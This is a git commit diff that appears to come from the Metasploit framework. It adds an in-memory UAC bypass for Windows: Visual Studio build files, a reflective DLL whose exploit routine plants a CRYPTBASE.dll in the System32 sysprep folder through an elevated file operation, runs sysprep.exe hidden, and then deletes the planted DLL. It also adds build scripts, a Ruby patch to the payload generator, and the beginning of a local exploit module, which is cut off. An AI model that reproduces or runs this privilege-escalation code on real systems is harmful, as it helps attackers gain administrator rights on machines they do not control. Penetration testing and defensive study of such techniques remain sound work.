Land #2431 - In-memory bypass uac
commit
a1aef92652
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,151 @@
|
|||
## Ignore Visual Studio temporary files, build results, and
|
||||
## files generated by popular Visual Studio add-ons.
|
||||
|
||||
# User-specific files
|
||||
*.suo
|
||||
*.user
|
||||
*.sln.docstates
|
||||
|
||||
# Build results
|
||||
|
||||
[Dd]ebug/
|
||||
[Rr]elease/
|
||||
x64/
|
||||
build/
|
||||
[Bb]in/
|
||||
[Oo]bj/
|
||||
|
||||
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
|
||||
!packages/*/build/
|
||||
|
||||
# MSTest test Results
|
||||
[Tt]est[Rr]esult*/
|
||||
[Bb]uild[Ll]og.*
|
||||
|
||||
*_i.c
|
||||
*_p.c
|
||||
*.ilk
|
||||
*.meta
|
||||
*.obj
|
||||
*.pch
|
||||
*.pdb
|
||||
*.pgc
|
||||
*.pgd
|
||||
*.rsp
|
||||
*.sbr
|
||||
*.tlb
|
||||
*.tli
|
||||
*.tlh
|
||||
*.tmp
|
||||
*.tmp_proj
|
||||
*.log
|
||||
*.vspscc
|
||||
*.vssscc
|
||||
.builds
|
||||
*.pidb
|
||||
*.log
|
||||
*.scc
|
||||
|
||||
# Visual C++ cache files
|
||||
ipch/
|
||||
*.aps
|
||||
*.ncb
|
||||
*.opensdf
|
||||
*.sdf
|
||||
*.cachefile
|
||||
|
||||
# Visual Studio profiler
|
||||
*.psess
|
||||
*.vsp
|
||||
*.vspx
|
||||
|
||||
# Guidance Automation Toolkit
|
||||
*.gpState
|
||||
|
||||
# ReSharper is a .NET coding add-in
|
||||
_ReSharper*/
|
||||
*.[Rr]e[Ss]harper
|
||||
|
||||
# TeamCity is a build add-in
|
||||
_TeamCity*
|
||||
|
||||
# DotCover is a Code Coverage Tool
|
||||
*.dotCover
|
||||
|
||||
# NCrunch
|
||||
*.ncrunch*
|
||||
.*crunch*.local.xml
|
||||
|
||||
# Installshield output folder
|
||||
[Ee]xpress/
|
||||
|
||||
# DocProject is a documentation generator add-in
|
||||
DocProject/buildhelp/
|
||||
DocProject/Help/*.HxT
|
||||
DocProject/Help/*.HxC
|
||||
DocProject/Help/*.hhc
|
||||
DocProject/Help/*.hhk
|
||||
DocProject/Help/*.hhp
|
||||
DocProject/Help/Html2
|
||||
DocProject/Help/html
|
||||
|
||||
# Click-Once directory
|
||||
publish/
|
||||
|
||||
# Publish Web Output
|
||||
*.Publish.xml
|
||||
*.pubxml
|
||||
|
||||
# NuGet Packages Directory
|
||||
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
|
||||
#packages/
|
||||
|
||||
# Windows Azure Build Output
|
||||
csx
|
||||
*.build.csdef
|
||||
|
||||
# Windows Store app package directory
|
||||
AppPackages/
|
||||
|
||||
# Others
|
||||
sql/
|
||||
*.Cache
|
||||
ClientBin/
|
||||
[Ss]tyle[Cc]op.*
|
||||
~$*
|
||||
*~
|
||||
*.dbmdl
|
||||
*.[Pp]ublish.xml
|
||||
*.pfx
|
||||
*.publishsettings
|
||||
|
||||
# RIA/Silverlight projects
|
||||
Generated_Code/
|
||||
|
||||
# Backup & report files from converting an old project file to a newer
|
||||
# Visual Studio version. Backup files are not needed, because we have git ;-)
|
||||
_UpgradeReport_Files/
|
||||
Backup*/
|
||||
UpgradeLog*.XML
|
||||
UpgradeLog*.htm
|
||||
|
||||
# SQL Server files
|
||||
App_Data/*.mdf
|
||||
App_Data/*.ldf
|
||||
|
||||
# =========================
|
||||
# Windows detritus
|
||||
# =========================
|
||||
|
||||
# Windows image file caches
|
||||
Thumbs.db
|
||||
ehthumbs.db
|
||||
|
||||
# Folder config file
|
||||
Desktop.ini
|
||||
|
||||
# Recycle Bin used on file shares
|
||||
$RECYCLE.BIN/
|
||||
|
||||
# Mac crap
|
||||
.DS_Store
|
|
@ -0,0 +1,28 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio 2013
|
||||
VisualStudioVersion = 12.0.21005.1
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "bypassuac", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Win32 = Debug|Win32
|
||||
Debug|x64 = Debug|x64
|
||||
Release|Win32 = Release|Win32
|
||||
Release|x64 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
|
||||
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
|
||||
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64
|
||||
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64
|
||||
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
|
||||
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64
|
||||
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,204 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}</ProjectGuid>
|
||||
<RootNamespace>reflective_dll</RootNamespace>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<ProjectName>bypassuac</ProjectName>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<PlatformToolset>v120</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup>
|
||||
<_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
|
||||
<IntDir>$(Configuration)\</IntDir>
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<IntDir>$(Platform)\$(Configuration)\</IntDir>
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
|
||||
<IntDir>$(Configuration)\</IntDir>
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<TargetName>$(ProjectName)-x86</TargetName>
|
||||
<IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\</IncludePath>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
|
||||
<IntDir>$(Configuration)\</IntDir>
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<TargetName>$(ProjectName)-x64</TargetName>
|
||||
<IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\;</IncludePath>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<MinimalRebuild>true</MinimalRebuild>
|
||||
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
|
||||
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
|
||||
<PrecompiledHeader />
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<TargetMachine>MachineX86</TargetMachine>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Midl>
|
||||
<TargetEnvironment>X64</TargetEnvironment>
|
||||
</Midl>
|
||||
<ClCompile>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<MinimalRebuild>true</MinimalRebuild>
|
||||
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
|
||||
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
|
||||
<PrecompiledHeader />
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<TargetMachine>MachineX64</TargetMachine>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<PrecompiledHeader />
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<TargetMachine>MachineX86</TargetMachine>
|
||||
</Link>
|
||||
<PostBuildEvent>
|
||||
<Command>
|
||||
IF EXIST "..\..\..\..\..\data\post\" GOTO COPY
|
||||
mkdir "..\..\..\..\..\data\post\"
|
||||
:COPY
|
||||
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\post\"</Command>
|
||||
</PostBuildEvent>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Midl>
|
||||
<TargetEnvironment>X64</TargetEnvironment>
|
||||
</Midl>
|
||||
<ClCompile>
|
||||
<Optimization>MaxSpeed</Optimization>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<PrecompiledHeader />
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||
<CompileAs>CompileAsCpp</CompileAs>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<TargetMachine>MachineX64</TargetMachine>
|
||||
</Link>
|
||||
<PostBuildEvent>
|
||||
<Command>
|
||||
IF EXIST "..\..\..\..\..\data\post\" GOTO COPY
|
||||
mkdir "..\..\..\..\..\data\post\"
|
||||
:COPY
|
||||
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\post\"</Command>
|
||||
</PostBuildEvent>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="src\Exploit.cpp" />
|
||||
<ClCompile Include="src\ReflectiveDll.c" />
|
||||
<ClCompile Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="src\Exploit.h" />
|
||||
<ClInclude Include="..\..\..\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
|
||||
<ClInclude Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,119 @@
|
|||
#include "Exploit.h"
|
||||
|
||||
void exploit()
|
||||
{
|
||||
|
||||
const wchar_t *szSysPrepDir = L"\\System32\\sysprep\\";
|
||||
const wchar_t *szSysPrepDir_syswow64 = L"\\Sysnative\\sysprep\\";
|
||||
const wchar_t *sySysPrepExe = L"sysprep.exe";
|
||||
const wchar_t *szElevDll = L"CRYPTBASE.dll";
|
||||
const wchar_t *szSourceDll = L"CRYPTBASE.dll";
|
||||
wchar_t szElevDir[MAX_PATH] = {};
|
||||
wchar_t szElevDir_syswow64[MAX_PATH] = {};
|
||||
wchar_t szElevDllFull[MAX_PATH] = {};
|
||||
wchar_t szElevDllFull_syswow64[MAX_PATH] = {};
|
||||
wchar_t szElevExeFull[MAX_PATH] = {};
|
||||
wchar_t path[MAX_PATH] = {};
|
||||
wchar_t windir[MAX_PATH] = {};
|
||||
const wchar_t *szElevArgs = L"";
|
||||
const wchar_t *szEIFOMoniker = NULL;
|
||||
PVOID OldValue = NULL;
|
||||
|
||||
IFileOperation *pFileOp = NULL;
|
||||
IShellItem *pSHISource = 0;
|
||||
IShellItem *pSHIDestination = 0;
|
||||
IShellItem *pSHIDelete = 0;
|
||||
|
||||
const IID *pIID_EIFO = &__uuidof(IFileOperation);
|
||||
const IID *pIID_EIFOClass = &__uuidof(FileOperation);
|
||||
const IID *pIID_ShellItem2 = &__uuidof(IShellItem2);
|
||||
|
||||
GetWindowsDirectoryW(windir, MAX_PATH);
|
||||
GetTempPathW(MAX_PATH, path);
|
||||
|
||||
/* %temp%\cryptbase.dll */
|
||||
wcscat_s(path, MAX_PATH, szSourceDll);
|
||||
|
||||
/* %windir%\System32\sysprep\ */
|
||||
wcscat_s(szElevDir, MAX_PATH, windir);
|
||||
wcscat_s(szElevDir, MAX_PATH, szSysPrepDir);
|
||||
|
||||
/* %windir%\sysnative\sysprep\ */
|
||||
wcscat_s(szElevDir_syswow64, MAX_PATH, windir);
|
||||
wcscat_s(szElevDir_syswow64, MAX_PATH, szSysPrepDir_syswow64);
|
||||
|
||||
/* %windir\system32\sysprep\cryptbase.dll */
|
||||
wcscat_s(szElevDllFull, MAX_PATH, szElevDir);
|
||||
wcscat_s(szElevDllFull, MAX_PATH, szElevDll);
|
||||
|
||||
/* %windir\sysnative\sysprep\cryptbase.dll */
|
||||
wcscat_s(szElevDllFull_syswow64, MAX_PATH, szElevDir_syswow64);
|
||||
wcscat_s(szElevDllFull_syswow64, MAX_PATH, szElevDll);
|
||||
|
||||
/* %windir%\system32\sysprep\sysprep.exe */
|
||||
wcscat_s(szElevExeFull, MAX_PATH, szElevDir);
|
||||
wcscat_s(szElevExeFull, MAX_PATH, sySysPrepExe);
|
||||
|
||||
if (CoInitialize(NULL) == S_OK)
|
||||
{
|
||||
if (CoCreateInstance(*pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void**) &pFileOp) == S_OK)
|
||||
{
|
||||
if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) == S_OK)
|
||||
{
|
||||
if (SHCreateItemFromParsingName((PCWSTR) path, NULL, *pIID_ShellItem2, (void**) &pSHISource) == S_OK)
|
||||
{
|
||||
if (SHCreateItemFromParsingName(szElevDir, NULL, *pIID_ShellItem2, (void**) &pSHIDestination) == S_OK)
|
||||
{
|
||||
if (pFileOp->CopyItem(pSHISource, pSHIDestination, szElevDll, NULL) == S_OK)
|
||||
{
|
||||
/* Copy the DLL file to the sysprep folder*/
|
||||
if (pFileOp->PerformOperations() == S_OK)
|
||||
{
|
||||
/* Execute sysprep.exe */
|
||||
SHELLEXECUTEINFOW shinfo;
|
||||
ZeroMemory(&shinfo, sizeof(shinfo));
|
||||
shinfo.cbSize = sizeof(shinfo);
|
||||
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
|
||||
shinfo.lpFile = szElevExeFull;
|
||||
shinfo.lpParameters = szElevArgs;
|
||||
shinfo.lpDirectory = szElevDir;
|
||||
shinfo.nShow = SW_HIDE;
|
||||
|
||||
Wow64DisableWow64FsRedirection(&OldValue);
|
||||
if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
|
||||
{
|
||||
WaitForSingleObject(shinfo.hProcess, 10000);
|
||||
CloseHandle(shinfo.hProcess);
|
||||
}
|
||||
|
||||
if (S_OK == SHCreateItemFromParsingName(szElevDllFull, NULL, *pIID_ShellItem2, (void**)&pSHIDelete))
|
||||
{
|
||||
if (0 != pSHIDelete)
|
||||
{
|
||||
if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
|
||||
{
|
||||
pFileOp->PerformOperations();
|
||||
// If we fail to delete the file probably SYSWOW64 process so use SYSNATIVE to get the correct path
|
||||
// DisableWOW64Redirect fails at this? Possibly due to how it interacts with UAC see:
|
||||
// http://msdn.microsoft.com/en-us/library/windows/desktop/aa384187(v=vs.85).aspx
|
||||
if (S_OK == SHCreateItemFromParsingName(szElevDllFull_syswow64, NULL, *pIID_ShellItem2, (void**)&pSHIDelete))
|
||||
{
|
||||
if (0 != pSHIDelete)
|
||||
{
|
||||
if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
|
||||
{
|
||||
pFileOp->PerformOperations();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,8 @@
|
|||
#include <Windows.h>
|
||||
#include <commctrl.h>
|
||||
#include <shlobj.h>
|
||||
#include <Shellapi.h>
|
||||
#include <stdio.h>
|
||||
#include <guiddef.h>
|
||||
|
||||
EXTERN_C void exploit();
|
|
@ -0,0 +1,26 @@
|
|||
#include "ReflectiveLoader.h"
|
||||
#include "Exploit.h"
|
||||
|
||||
extern HINSTANCE hAppInstance;
|
||||
|
||||
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
|
||||
{
|
||||
BOOL bReturnValue = TRUE;
|
||||
switch( dwReason )
|
||||
{
|
||||
case DLL_QUERY_HMODULE:
|
||||
if( lpReserved != NULL )
|
||||
*(HMODULE *)lpReserved = hAppInstance;
|
||||
break;
|
||||
case DLL_PROCESS_ATTACH:
|
||||
hAppInstance = hinstDLL;
|
||||
exploit();
|
||||
ExitProcess(0);
|
||||
break;
|
||||
case DLL_PROCESS_DETACH:
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
break;
|
||||
}
|
||||
return bReturnValue;
|
||||
}
|
|
@ -0,0 +1,38 @@
|
|||
@ECHO OFF
|
||||
IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
|
||||
|
||||
IF "%1"=="x86" GOTO BUILD_X86
|
||||
IF "%1"=="X86" GOTO BUILD_X86
|
||||
IF "%1"=="x64" GOTO BUILD_X64
|
||||
IF "%1"=="X64" GOTO BUILD_X64
|
||||
|
||||
ECHO "Building Exploits x64 and x86 (Release)"
|
||||
SET PLAT=all
|
||||
GOTO RUN
|
||||
|
||||
:BUILD_X86
|
||||
ECHO "Building Exploits x86 (Release)"
|
||||
SET PLAT=x86
|
||||
GOTO RUN
|
||||
|
||||
:BUILD_X64
|
||||
ECHO "Building Exploits x64 (Release)"
|
||||
SET PLAT=x64
|
||||
GOTO RUN
|
||||
|
||||
:RUN
|
||||
ECHO "Building Bypass UAC Injection"
|
||||
msbuild.exe make.msbuild /target:%PLAT%
|
||||
|
||||
|
||||
FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
|
||||
SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
|
||||
echo Finished %ldt%
|
||||
|
||||
GOTO :END
|
||||
|
||||
:NEED_VS
|
||||
ECHO "This command must be executed from within a Visual Studio Command prompt."
|
||||
ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
|
||||
|
||||
:END
|
|
@ -0,0 +1,19 @@
|
|||
<?xml version="1.0" standalone="yes"?>
|
||||
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup>
|
||||
<SolutionPath>.\bypassuac_injection.sln</SolutionPath>
|
||||
</PropertyGroup>
|
||||
|
||||
<Target Name="all" DependsOnTargets="x86;x64" />
|
||||
|
||||
<Target Name="x86">
|
||||
<Message Text="Building Bypass UAC (Injection) Release version x86" />
|
||||
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
||||
</Target>
|
||||
|
||||
<Target Name="x64">
|
||||
<Message Text="Building Bypass UAC (Injection) Release version x64" />
|
||||
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
|
||||
</Target>
|
||||
</Project>
|
||||
|
|
@ -54,6 +54,13 @@ IF "%ERRORLEVEL%"=="0" (
|
|||
POPD
|
||||
)
|
||||
|
||||
IF "%ERRORLEVEL%"=="0" (
|
||||
ECHO "Building bypassuac (in-memory)"
|
||||
PUSHD bypassuac_injection
|
||||
msbuild.exe make.msbuild /target:%PLAT%
|
||||
POPD
|
||||
)
|
||||
|
||||
FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
|
||||
SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
|
||||
echo Finished %ldt%
|
||||
|
|
|
@ -16,4 +16,5 @@ module Msf::Post::Windows
|
|||
require 'msf/core/post/windows/shadowcopy'
|
||||
require 'msf/core/post/windows/user_profiles'
|
||||
require 'msf/core/post/windows/ldap'
|
||||
require 'msf/core/post/windows/reflective_dll_injection'
|
||||
end
|
||||
|
|
|
@ -422,6 +422,17 @@ require 'msf/core/exe/segment_injector'
|
|||
if opts[:exe_type] == :dll
|
||||
mt = pe.index('MUTEX!!!')
|
||||
pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
|
||||
|
||||
if opts[:dll_exitprocess]
|
||||
exit_thread = "\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00"
|
||||
exit_process = "\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73"
|
||||
et_index = pe.index(exit_thread)
|
||||
if et_index
|
||||
pe[et_index,exit_process.length] = exit_process
|
||||
else
|
||||
raise RuntimeError, "Unable to find and replace ExitThread in the DLL."
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
return pe
|
||||
|
|
|
@ -0,0 +1,233 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/exe'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Exploit::EXE
|
||||
include Post::File
|
||||
include Post::Windows::Priv
|
||||
include Post::Windows::ReflectiveDLLInjection
|
||||
|
||||
